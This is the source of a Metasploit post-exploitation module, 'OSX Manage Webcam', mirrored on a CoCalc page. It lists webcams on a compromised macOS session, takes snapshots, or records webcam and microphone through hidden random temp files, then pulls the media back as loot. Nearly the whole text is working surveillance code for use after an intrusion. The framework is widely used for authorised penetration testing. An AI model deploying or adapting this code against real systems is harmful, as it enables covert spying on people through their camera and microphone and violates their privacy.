CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/post/osx/manage/webcam.rb
Views: 11784
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
require 'shellwords'

7


8
class MetasploitModule < Msf::Post

9
  include Msf::Post::File

10
  include Msf::Auxiliary::Report

11
  include Msf::Post::OSX::RubyDL

12


13
  POLL_TIMEOUT = 120

14


15
  def initialize(info = {})

16
    super(

17
      update_info(

18
        info,

19
        'Name' => 'OSX Manage Webcam',

20
        'Description' => %q{

21
          This module will allow the user to detect installed webcams (with

22
          the LIST action), take a snapshot (with the SNAPSHOT action), or

23
          record a webcam and mic (with the RECORD action)

24
        },

25
        'License' => MSF_LICENSE,

26
        'Author' => [ 'joev'],

27
        'Platform' => [ 'osx'],

28
        'SessionTypes' => [ 'shell' ],

29
        'Actions' => [

30
          [ 'LIST', { 'Description' => 'Show a list of webcams' } ],

31
          [ 'SNAPSHOT', { 'Description' => 'Take a snapshot with the webcam' } ],

32
          [ 'RECORD', { 'Description' => 'Record with the webcam' } ]

33
        ],

34
        'DefaultAction' => 'LIST'

35
      )

36
    )

37


38
    register_options(

39
      [

40
        OptInt.new('CAMERA_INDEX', [true, 'The index of the webcam to use. `set ACTION LIST` to get a list.', 0]),

41
        OptInt.new('MIC_INDEX', [true, 'The index of the mic to use. `set ACTION LIST` to get a list.', 0]),

42
        OptString.new('JPG_QUALITY', [false, 'The compression factor for snapshotting a jpg (from 0 to 1)', '0.8']),

43
        OptString.new('TMP_FILE',

44
                      [true, 'The tmp file to use on the remote machine', '/tmp/.<random>/<random>']),

45
        OptBool.new('AUDIO_ENABLED', [false, 'Enable audio when recording', true]),

46
        OptString.new('AUDIO_COMPRESSION',

47
                      [true, 'Compression type to use for audio', 'QTCompressionOptionsHighQualityAACAudio']),

48
        OptString.new('VIDEO_COMPRESSION',

49
                      [true, 'Compression type to use for video', 'QTCompressionOptionsSD480SizeH264Video']),

50
        OptEnum.new('SNAP_FILETYPE',

51
                    [true, 'File format to use when saving a snapshot', 'png', %w[jpg png gif tiff bmp]]),

52
        OptInt.new('RECORD_LEN', [true, 'Number of seconds to record', 30]),

53
        OptInt.new('SYNC_WAIT', [true, 'Wait between syncing chunks of output', 5])

54
      ]

55
    )

56
  end

57


58
  def run

59
    fail_with(Failure::BadConfig, 'Invalid session ID selected.') if client.nil?

60
    fail_with(Failure::BadConfig, 'Invalid action') if action.nil?

61


62
    num_chunks = (datastore['RECORD_LEN'].to_f / datastore['SYNC_WAIT'].to_f).ceil

63
    tmp_file = datastore['TMP_FILE'].gsub('<random>') { Rex::Text.rand_text_alpha(10) + '1' }

64
    ruby_cmd = osx_capture_media(

65
      action: action.name.downcase,

66
      snap_filetype: datastore['SNAP_FILETYPE'],

67
      audio_enabled: datastore['AUDIO_ENABLED'],

68
      video_enabled: true,

69
      num_chunks: num_chunks,

70
      chunk_len: datastore['SYNC_WAIT'],

71
      video_device: datastore['CAMERA_INDEX'],

72
      audio_device: datastore['MIC_INDEX'],

73
      snap_jpg_compression: datastore['JPG_QUALITY'].to_f,

74
      video_compression: datastore['VIDEO_COMPRESSION'],

75
      audio_compression: datastore['AUDIO_COMPRESSION'],

76
      record_file: tmp_file,

77
      snap_file: tmp_file + datastore['SNAP_FILETYPE']

78
    )

79


80
    output = cmd_exec(['ruby', '-e', ruby_cmd].shelljoin)

81
    if action.name =~ /list/i

82
      print_good output

83
    elsif action.name =~ /record/i

84
      @pid = output.to_i

85
      print_status "Running record service with PID #{@pid}"

86
      (0...num_chunks).each do |i|

87
        # wait SYNC_WAIT seconds

88
        print_status "Waiting for #{datastore['SYNC_WAIT'].to_i} seconds"

89
        Rex.sleep(datastore['SYNC_WAIT'])

90
        # start reading for file

91
        begin

92
          ::Timeout.timeout(poll_timeout) do

93
            loop do

94
              if File.exist?(tmp_file)

95
                # read file

96
                contents = File.read(tmp_file)

97
                # delete file

98
                rm_f(tmp_file)

99
                # roll filename

100
                base = File.basename(tmp_file, '.*') # returns it with no extension

101
                num = ((base.match(/\d+$/) || ['0'])[0].to_i + 1).to_s

102
                ext = File.extname(tmp_file) || 'o'

103
                tmp_file = File.join(File.dirname(tmp_file), base + num + '.' + ext)

104
                # store contents in file

105
                title = 'OSX Webcam Recording ' + i.to_s

106
                f = store_loot(title, 'video/mov', session, contents,

107
                               "osx_webcam_rec#{i}.mov", title)

108
                print_good "Record file captured and saved to #{f}"

109
                print_status 'Rolling movie file. '

110
                break

111
              else

112
                Rex.sleep(0.3)

113
              end

114
            end

115
          end

116
        rescue ::Timeout::Error

117
          fail_with(Failure::TimeoutExpired, 'Client did not respond to new file request, exiting.')

118
        end

119
      end

120
    elsif action.name =~ /snap/i

121
      if output.include?('(RuntimeError)')

122
        print_error output

123
        return

124
      end

125


126
      snap_type = datastore['SNAP_FILETYPE']

127
      img = read_file(tmp_file + snap_type)

128
      f = store_loot('OSX Webcam Snapshot', "image/#{snap_type}",

129
                     session, img, "osx_webcam_snapshot.#{snap_type}", 'OSX Webcam Snapshot')

130
      print_good "Snapshot successfully taken and saved to #{f}"

131
    end

132
  end

133


134
  def cleanup

135
    return unless @cleaning_up.nil?

136


137
    @cleaning_up = true

138


139
    if action.name =~ (/record/i) && !@pid.nil?

140
      print_status('Killing record service...')

141
      cmd_exec("/bin/kill -9 #{@pid}")

142
    end

143
  end

144


145
  private

146


147
  def poll_timeout

148
    POLL_TIMEOUT

149
  end

150
end

151


152